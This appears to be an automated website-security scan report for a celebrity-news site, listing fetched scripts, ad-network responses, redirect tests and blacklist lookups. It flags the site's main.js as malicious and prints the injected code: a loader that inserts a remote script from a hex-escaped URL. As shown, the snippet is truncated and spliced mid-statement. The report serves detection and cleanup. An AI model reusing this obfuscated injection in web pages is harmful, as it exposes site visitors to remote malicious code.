Scanned pages/files
Request | Server response | Status |
http://www.x17online.com/ | 200 OK Content-Length: 68585 Content-Type: text/html | clean |
http://www.x17online.com//ajax.googleapis.com/ajax/libs/jquery/2.1.0/jquery.min.js/ | 200 OK Content-Length: 68585 Content-Type: text/html | clean |
http://www.x17online.com//ajax.googleapis.com/ajax/libs/jqueryui/1.9.2/jquery-ui.min.js/ | 200 OK Content-Length: 68585 Content-Type: text/html | clean |
http://www.x17online.com/bootstrap/js/bootstrap.min.js | 200 OK Content-Length: 29165 Content-Type: application/javascript | clean |
http://www.x17online.com/js/main.js | 200 OK Content-Length: 4212 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var topModuleData; var topModuleCounter = 0; $(document).ready(function(){ $('.faceOff .face_off_vote').click(function(){ var faceOffId = $(this).parent().parent().find('.faceOffId').val(); voteFaceOff(faceOffId); }); $('.faceOff .face_off_results').click(function(){ var faceOffId = $(this).parent().parent().find('.faceOffId').val(); viewResults(faceOffId); }); }); function viewResults(faceOffId) { $.get(webRoot + "/ gads.async = true; gads.type = 'text/javascript'; gads.src = '\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x78\x31\x37\x6f\x6e\x6c\x69\x6e\x65\x2e\x63\x6f\x6d\x2f\x68\x6f\x6c\x6c\x79\x77\x6f\x6f\x64\x2d\x62\x72\x65\x61\x6b\x64\x6f\x77\x6e\x2f\x6e\x69\x63\x6f\x6c\x61\x73\x5f\x63\x61\x67\x65\x2f\x64\x65\x66\x61\x75\x6c\x74\x2e\x70\x68\x70'; var node = document.getElementsByTagName('body')[0]; node.parentNode.insertBefore(gads, node); }); Antivirus reports:
| ||
http://jwpsrv.com/library/EjOdqOQBEeKpUhIxOQulpA.js | 200 OK Content-Length: 70706 Content-Type: text/javascript | clean |
http://www.google.com/jsapi | 200 OK Content-Length: 24552 Content-Type: text/javascript | clean |
http://i.po.st/share/script/post-widget.js | 200 OK Content-Length: 117725 Content-Type: application/x-javascript | clean |
http://adkengage.com/pshandler.js?aid=8270&v=7OIDemmNYwBoVSxp7EwPxw%3d%3d&dpid=2768 | 200 OK Content-Length: 687 Content-Type: application/x-javascript | clean |
http://ib.adnxs.com/ttj?id=2178791&position=above | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Sun, 05 Oct 2014 14:52:34 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fid%3D2178791%26position%3Dabove Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Mon, 06-Oct-2014 14:52:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=3713224178666039979; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fid%3d2178791%26position%3dabove | 200 OK Content-Length: 1025 Content-Type: text/html | clean |
http://ib.adnxs.com/ttj?ttjb=1&bdc=1412520754&bdh=NRz5zWgVO1L4ZTOhZKa-mDalGl0.'+c+'&id=2178791&position=above | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Sun, 05 Oct 2014 14:52:34 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fttjb%3D1%26bdc%3D1412520754%26bdh%3DNRz5zWgVO1L4ZTOhZKa-mDalGl0.%27%2Bc%2B%27%26id%3D2178791%26position%3Dabove Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Mon, 06-Oct-2014 14:52:34 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2486418154245445571; path=/; expires=Sat, 03-Jan-2015 14:52:34 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fttjb%3d1%26bdc%3d1412520754%26bdh%3dnrz5zwgvo1l4ztohzka-mdalgl0.%27%2bc%2b%27%26id%3d2178791%26position%3dabove | 200 OK Content-Length: 1295 Content-Type: application/javascript | clean |
http://ib.adnxs.com/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://ads.rubiconproject.com/ad/8621.js | 200 OK Content-Length: 21299 Content-Type: text/javascript | clean |
http://www.x17online.com//ads.incmd10.com/creative/2-002137205-00001j;size=1;tag_id=5746;ref=INSERT_REFERRER_HERE;cb=INSERT_CACHEBUSTER_HERE/ | 200 OK Content-Length: 68585 Content-Type: text/html | clean |
http://ib.adnxs.com/ttj?id=1500853&position=below | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, private Date: Sun, 05 Oct 2014 14:52:36 GMT Pragma: no-cache Location: http://ib.adnxs.com/bounce?%2Fttj%3Fid%3D1500853%26position%3Dbelow Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: uuid2=0; path=/; expires=Sat, 03-Jan-2015 14:52:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: sess=1; path=/; expires=Mon, 06-Oct-2014 14:52:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2480370617130020616; path=/; expires=Sat, 03-Jan-2015 14:52:36 GMT; domain=.adnxs.com; HttpOnly X-XSS-Protection: 0 | clean |
http://ib.adnxs.com/bounce?%2fttj%3fid%3d1500853%26position%3dbelow | 200 OK Content-Length: 1025 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: x17online.com
Result:
GET / HTTP/1.1
Host: x17online.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: x17online.com
Referer: http://www.google.com/search?q=x17online.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: x17online.com
Referer: http://www.google.com/search?q=x17online.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=x17online.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://x17online.com/
Result: x17online.com is not infected or malware details are not published yet.
Result: x17online.com is not infected or malware details are not published yet.